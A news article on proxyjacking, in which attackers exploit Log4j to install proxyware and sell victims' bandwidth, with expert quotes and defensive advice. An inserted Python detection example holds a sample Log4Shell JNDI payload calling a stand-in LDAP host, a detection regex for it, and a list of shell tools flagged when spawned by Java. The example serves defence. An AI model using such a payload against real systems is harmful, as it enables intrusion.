Online raiders are stealing IP addresses and converting them to cash by selling them to so-called proxyware services.
Malicious actors are planting proxyware on computers without the owner’s knowledge, then selling the unit’s IP address to a proxyware service, making as much as US$10 a month for every compromised device, the threat research team at Sysdig reported Tuesday.
Proxyware services allow a user to make money by sharing their internet connection with others, the researchers explained in a company blog. Attackers, however, are leveraging the platforms to monetize the internet bandwidth of victims, similar to how malicious cryptocurrency mining attempts to monetize the CPU cycles of infected systems.
“Proxyware services are legitimate, but they cater to people who want to bypass protections and restrictions,” observed Michael Clark, director of threat research at Sysdig, a San Francisco-based maker of a SaaS platform for threat detection and response.
“They use residential addresses to bypass bot protection,” he told TechNewsWorld.
For example, buying up a lot of a sneaker brand can be very profitable, but websites put in protections that limit sales to a single pair per IP address, he explained. Resellers use these proxy IP addresses to buy and resell as many pairs as possible.
“Sites also trust residential IP addresses more than other kinds of addresses,” he added. “That’s why there’s such a premium on residential addresses, but cloud services and mobile phones are also starting to be desirable for these services.”
Food for Influencers
These apps are often promoted via referral programs, with many notable “influencers” promoting them for passive income opportunities, said Immanuel Chavoya, the senior manager of product security at SonicWall, a network firewall maker in Milpitas, Calif.
“The income-seekers download the software to share their bandwidth and make money,” he told TechNewsWorld.
“However,” he continued, “these proxyware services can expose users to disproportionate levels of risks, as the users cannot control the activities performed using their home and mobile IP addresses.”
“There have been instances of users or their infrastructure unwittingly becoming involved in criminal activity,” he added.
Such activity includes accessing potential click-fraud or silent advertisement sites, SQL injection probing, attempts to access the critical /etc/passwd file on Linux and Unix systems (that keeps track of registered users with access to a system), crawling government websites, crawling of personally identifiable information — including national IDs and social security numbers — and bulk registration of social media accounts.
Timothy Morris, chief security advisor at Tanium, a maker of an endpoint management and security platform in Kirkland, Wash., pointed out that proxyware services can be used to generate web traffic or manipulate web search results.
“Some proxy clients will come with ‘bonus content’ that can be ‘trojanized,’ or malicious, providing unauthorized use of the computer running the proxy service, typically for crypto mining,” he told TechNewsWorld.
Organizations infested with proxyware can see their cloud platform management costs increase and see service degradation, noted Sysdig Threat Research Engineer Crystal Morin.
“And just because there’s an attacker doing crypto mining or proxyjacking on your network, that doesn’t mean that’s all that they’re doing,” she told TechNewsWorld.
“There’s a concern that if they’re using Log4j or any other vulnerability, and they have access to your network,” she continued, “they could be doing something beyond using the system for profit, so you have to take precautions and look for other malicious activity.”
Clark added that an organization could face some reputational risks from proxyjacking, too.
“There could be illegal activity going on that could be attributed to a company or organization whose IP was taken, and they could end up on a deny list for threat intelligence services, which could lead to a whole host of problems if people stop dropping the victim’s internet connections,” he said.
“There’s also potential law enforcement investigations that could occur,” he noted.
He added that the proxyjacking activity uncovered by the Sysdig researchers was aimed at organizations. “The attackers cast a wide net over the whole internet and targeted cloud infrastructure,” he said.
“Usually,” he continued, “we’d see this kind of attack bundled in Windows adware. This time we’re seeing cloud networks and servers targeted, which is more business oriented.”
Log4j Vulnerability Exploited
The attackers studied by the Sysdig researchers exploited the Log4j vulnerability to compromise their targets. That flaw in a popular open-source Java-based logging utility discovered in 2021 is estimated to have affected 93% of all enterprise cloud environments.
“Millions of systems are still running with vulnerable versions of Log4j, and according to Censys, more than 23,000 of those are reachable from the internet,” the researchers wrote.
“Log4j is not the only attack vector for deploying proxyjacking malware, but this vulnerability alone could theoretically provide more than $220,000 in profit per month,” they added. “More conservatively, a modest compromise of 100 IPs will net a passive income of nearly $1,000 per month.”
While it shouldn’t be an issue, there is still a “long tail” of systems vulnerable to the Log4j vulnerability that haven’t been patched, observed Mike Parkin, a senior technical engineer at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation in Tel Aviv, Israel.
“The number of vulnerable systems keeps going down, but it’ll still be a while before it reaches zero — either from all of the remaining ones being patched or the remaining ones being found and exploited,” he told TechNewsWorld.
“The vulnerability is being actively exploited,” Morris added. “There are also reports of vulnerable versions still being downloaded.”
Protect Through Detection
To protect themselves from proxyjacking, Morin recommended strong and continuous real-time threat detection.
“Unlike cryptojacking, where you’ll see spikes in CPU use, the CPU usage is pretty minimal here,” she explained. “So, the best way to detect this is through detection analytics, where you’re looking for the kill chain aspects of the attack — initial access, vulnerability exploitation, detection evasion, persistence.”
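To make Morin’s point concrete, here is an added Python example (not Sysdig’s code and not from the article) that correlates kill-chain findings across constructed host telemetry instead of relying on CPU load; the thresholds, field names and sample records are assumptions.

```python
import re
from dataclasses import dataclass, field

# Marker used by many detection rules for Log4Shell exploitation attempts.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)

@dataclass
class HostTelemetry:
    host: str
    avg_cpu_pct: float         # sustained CPU: high for cryptojacking, low for proxyjacking
    egress_mb_per_hour: float  # outbound bandwidth, which is what proxyware sells
    web_requests: list = field(default_factory=list)      # request lines that reached a Java app
    new_persistence: list = field(default_factory=list)   # cron/systemd entries created this window
    java_child_procs: list = field(default_factory=list)  # command lines spawned by the JVM

def kill_chain_findings(t: HostTelemetry) -> list:
    """Return the kill-chain stages observed on one host (assumed thresholds)."""
    findings = []
    if any(JNDI_LOOKUP.search(r) for r in t.web_requests):
        findings.append("initial_access:log4j_jndi_lookup")
    if any((p.split() or [""])[0] in ("sh", "bash", "curl", "wget") for p in t.java_child_procs):
        findings.append("execution:jvm_spawned_shell")
    if t.new_persistence:
        findings.append("persistence:new_autostart")
    if t.egress_mb_per_hour > 500 and t.avg_cpu_pct < 15:
        findings.append("impact:high_egress_low_cpu")
    return findings

def classify(t: HostTelemetry) -> str:
    """Correlate stages: bandwidth alone only warrants review, a chain raises an alert."""
    f = kill_chain_findings(t)
    if t.avg_cpu_pct > 80:
        return "cryptojacking_suspected"
    if "impact:high_egress_low_cpu" in f and len(f) >= 3:
        return "proxyjacking_suspected"
    return "review" if f else "benign"

# Constructed sample telemetry (not real hosts and not real Sysdig data).
SAMPLE_HOSTS = [
    HostTelemetry("web-01", 6.0, 900.0,
                  web_requests=['GET /login HTTP/1.1 ua="${jndi:ldap://example.invalid/x}"'],
                  new_persistence=["/etc/cron.d/sys-update"],
                  java_child_procs=["sh -c /tmp/.p/run.sh"]),
    HostTelemetry("build-02", 97.0, 20.0,
                  new_persistence=["/etc/systemd/system/kworkerd.service"]),
    HostTelemetry("backup-03", 8.0, 1200.0),  # nightly off-site backup: high egress, nothing else
]

if __name__ == "__main__":
    for h in SAMPLE_HOSTS:
        print(h.host, classify(h), kill_chain_findings(h))
```

The backup host shows why a single signal is not enough: it has the same low-CPU, high-egress profile as proxyware but none of the other stages, so it is flagged for review rather than alerted on.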
Chavoya advised organizations to create granular rules through application whitelisting for which types of applications are permissible on end-user devices.
Whitelisting involves creating a list of approved applications that can be run on devices within the organization’s network and blocking any other applications from running.
“This can be a highly effective way to prevent proxyware and other types of malware from running on devices within an organization’s network,” Chavoya said.
“By creating granular rules for which types of applications are permissible on end-user devices, organizations can ensure that only authorized and necessary applications are allowed to run,” he continued.
“This can greatly reduce the risk of proxyjacking and other types of cyberattacks that rely on unauthorized applications running on end-user devices,” he concluded.